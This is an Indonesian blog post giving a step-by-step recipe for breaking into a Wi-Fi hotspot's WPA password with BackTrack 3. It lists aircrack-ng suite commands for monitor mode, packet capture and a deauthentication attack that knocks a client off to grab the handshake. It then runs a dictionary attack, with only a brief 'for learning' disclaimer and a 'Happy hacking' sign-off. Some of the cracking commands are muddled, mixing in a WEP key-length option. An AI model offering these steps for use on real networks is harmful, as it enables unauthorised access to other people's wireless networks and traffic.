Kamis, 17 Maret 2011

Menjebol Password WPA pada Hotspot

Menyambung post sebelum ini yaitu menjebol password WEP, skarang saya coba bahas tentang WPA. skali lagi content yang terkandung dalam post ini adalah untuk pembelajaran, jika disalahgunakan saya ga bertanggung jawab. Kawasan bekerja nya masih sama, yaitu backtrack 3. Sebenarnya menjebol password WPA sangat sulit dan tingkat keberhasilannya lebih rendah.


Menjebol WPA lebih sulit daripada WEP karena harus menggunakan kamus, kalau mau coba, kita harus mendapatkan informasi:





  • BSSID (Mac Address AP)

  • WLAN Mac Address

  • Channel


Export Informasi tadi lewat shell :

[plain]
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1
[/plain]

Ganti mode WLAN kita ke monitoring mode:

[plain]
airmon-ng start wlan0 1
[/plain]

Jalankan airodump:

[plain]
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0
[/plain]

Untuk mempercepat prosesnya, gunakan perintah:

[plain]
aireplay-ng -0 1 -a MAC_ADDR_AP -c MAC_ADDR_CLIENT mon0
[/plain]

Nah, kuncinya di cracking WPA itu kan ketersediaan kamus bisa cek di sini:
http://www.aircrack-ng.org/doku.php?id=faq
http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

kalau kamus nya udah ada, kita lanjut crackingnya dengan memanfaatkan paket hasilcapture tadi.

[plain]
# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap -b MAC BSSID
[/plain]

Atau bisa juga dengan salah satu perintah2 berikut :

[plain]
# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt
# aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt
# aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt
# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt
[/plain]

Happy hacking.. ;)

0 komentar:

Posting Komentar